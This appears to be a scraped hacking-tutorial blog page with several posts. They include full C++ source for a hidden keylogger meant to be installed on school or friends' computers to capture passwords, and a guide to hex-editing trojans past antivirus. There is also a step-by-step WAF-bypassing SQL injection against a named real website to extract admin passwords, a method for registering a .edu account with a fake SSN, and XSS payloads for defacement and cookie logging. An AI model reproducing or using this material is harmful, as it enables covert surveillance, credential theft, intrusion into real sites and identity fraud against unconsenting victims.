How to create Keylogger using Visual C++?

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.



Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++.  Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.

For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.

Read More

html button in Facebook walls

You can share a html button in walls as a statuts.  Can you believe it?  This hacking trick found by Acizninja DeadcOde.

• Login to Your Facebook Account.
• Copy the following code and paste in the Address bar:

https://www.facebook.com/dialog/feed?app_id=209403259107231&redirect_uri=https%3A%2F%2Fwww..facebook.com&message&link=http%3A%2F%2Fwww.BreakTheSecurity.com%2F&name=<center><button>Visit+:+BreakTheSecurity<%2Fbutton><%2Fcenter>

Press the share button now.  Now visit your profile page, you can see the button.  You can also share it with your friends.

you can change
 www.BreakTheSecurity.com with your address.
BreakTheSec is button display name.
Don't change 20940325910723.  This is application id.

These are some urls with modified code:
a. http://goo.gl/6yZPr
b. http://tinyurl.com/3thplca
c. http://goo.gl/3NgWY (with music)

Credits:Acizninja DeadcOde

Read More

1337 (leet) language for hackers who are using facebook

Hi Mates !
if you Love 1337 then its a Good News for you, Facebook officialy Launched H4X0R's Language (Hackers) 1337 (leet speak).


How to apply 1337 On your Facebook ?
1- Login to your Facebook account
2- Goto account setting
3- search for language Option
4- now set it to "1337 speak
you've done !
if you want to use Facebook in your old language then set it to English (US) again


enjoy :)

Read More

Hex Editing to make Trojans & viruses Undetectable-Basic Guide

You may not be familiar that what is hex editing and also you may not be familiar that how can we use this technique to hide our viral program or a Trojan. Many of you may know other ways of hiding virus too like using public cyptors which will also be posted here soon. Many of you also asked that how to hide a Trojan or your created server in key loggers so that the antivirus of the victim may not identify the virus and he may not get warned. So, I will surely like to tell my readers that how the hackers make it possible and how can you be fooled by hackers too as they may fool your antivirus, So, its necessary that you should have this knowledge as the view of security.

What is Hex editing?

Hex editing is a method to hide miscellaneous programs containing viruses and Trojans from a specific antivirus. Here I used the word specific because its actually up to you that for which antivirus you want to hex edit it. so, that the particular antivirus may not catch the virus. Now if the Trojan is popular and the viral code is old then its sure that every latest updates of the all antiviruses may contain the information about that Trojan as well as virus. So, here comes into play the hard work which is just from you. In hex editing those part of codes in the program are removed which are cause of the virus detection or altered to some other coding which may not be present in antivirus definition as viral code. So, using this scheme we can easily bypass the required antivirus.

How to do Hex Editing?

Now in order to find that particular viral code which is present in the antivirus definition as the viral code we have to split our Trojan into many parts. And after that separate those parts which on scan again show virus as an alert in antivirus. Now, again we have to split those parts and thus this scheme is repeated until we find exact part and after that we will need a hex editor the edit the specific code. e-g xx is present in antivirus definition as viral code we shall change it into xy so that antivirus may not detect it. After this we shall again combine all the pieces back into a single executable file. So what we are going to need?

• A unpacked trojan server (Your Virus)
• File Splitter (Download File Splitter here)
• Hex Editor (Download Open Source Hex Editor here)

Using  the splitter distribute the infected program into small parts and then scan every part, when a part is detected as virus again distribute that in a new folder and then scan every part and do this until you get smallest part which contains piece of viral code which can be recognized by antivirus. Edit that piece or pieces in hex editor and change the value of first line to 0, like I did:-

and then re scan that part if you get alert of virus again then do the same with next line and save it and then scan hope after that the alert won’t occur. Now, rebuild those parts by the “File splitter builder exe” given in every folder where you have split a file and then move on like this and start merging parts by the exe given of file splitter for every part which you have distributed in the same folder where you have split any part. And then scan your Trojan in the end and hope it will not be detectable. I’ll explain all this in detail someday. Its enough for today.

Read More

ByPassing Web Application Firewall in SQL injection

hi  all !

Today i am going to present a tutorial on  ByPassing Web Application Firewall in SQL injection 

ok lets start. i am taking a website as an example which is WAF protected 

come to Point ! our test website is 

http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=2109

first of all we will find out the total number of columns 

total number of columns are 14 (find out columns using order by command)

now we are going to use union select command to find out through which column

our data will be displayed to the screen

http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109

 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--

 but WAF will block it and 403 page will be displayed 

 ok 

how to bypass it ?

use union and select keyword as inline commant and url will be like this 

 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

 firewall bypassed :D

 ok 

 screen is showing number 2,3 and 9. so we can take any of these and i am going to exract data via column 2 

 we are going to extract the tables name 

 url will be like this one 

 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/*!table_schema*/+like+database()+limit 0,1--

 we are using limit clause because group _concat not working and we can extract  tables name one by one using limit clause limit 0,1 will help us to extract first table name from database to extract next table name increase the value of limit 0,1 to limit 1,1like this

 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/*!table_schema*/+like+database()+limit 1,1--

 and page will show next table name

we got the admin table that is "admin" 

 its time to gain the names of columns of  table "admin"

 URL will be like this :-

 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/*!table_name*/=char(97,100,109,105,110) limit 0,1--

 again we need to use limit clause (same reason , group_concat not working) 

  by executing this url we got the column having name username

when i incresed the value of limit from limit 0,1 to limit 1,1 , second column name that is Password showed on screen

http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/*!table_name*/=char(97,100,109,105,110) limit 0,1--

we have done with columns too table name is admin and columns are Username and Passwor lets move to final step  now we are goung to extract to username and password from username and password column when group_concat is not working its batter to extract data from one column at a time 

i am going to extract the password an  URL will be like this :-

   http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!Password*/,3,4,5,6,7,8,9,10,11,12,13,14+from+admin-

   and this  tutorial has been over :D

   Thank you !

Read More

How to get .edu e-mail adress

1) Go to https://eims.maricopa.edu/MAW/MAW.html and check "I am a new student and have never attended any Maricopa Community College or Skill Centers." Then type in the verification code.

 2) Open new window/tab and go to http://www.fakenamegenerator.com/ and find the SSN. Remove any hashes so its only numeric. Enter a fake Date of Birth, First Name, and Last Name.


3) Finish registration by using a fake phone number, zip code, city, etc.. Use your real e-mail address. Type in a password and click Next.

4) Enter the 2 security questions as you wish.

5) You're done! Remember to write down and save the MEID as you'll need it to log in. The password is the password you entered.

6) Wait for about 20 minutes and then go to http://mail.google.com/a/maricopa.edu to login. That'll be your login link whenever you want to use your ID.

Read More

Full Website Hacking Simulator (DVWA)

(DVWA) Damn Vulnerable Web Application  is a collection of website hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

DVWA include some web hacking tools such as :
- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download here

Read More

XSS (Cross Site Scripting)

 

 

This is a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.

What is XSS, what can I accomplish with it?
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?
Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.

What types of XSS are there?
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?
The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

**<*script*>alert('XSS');</*script*>
(remove every * )
We now see a pop up message on our screen saying "XSS". This is what it should look like:http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

"*>*<script*>alert('XSS');</*script*>
(remove every * )
Okay, we have found out that it is vulnerable. We can now move on.

How can I deface a webpage with XSS?
I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.
First I will be starting with persistent XSS. Since it's persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:

<*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*>
(remove every * )
Remember, you can always alter the code if it doesn't work.
You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.
Okay. Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

How to make a cookie logger. (Cookie Logger's Tutorial Coming Soon ...)

Read More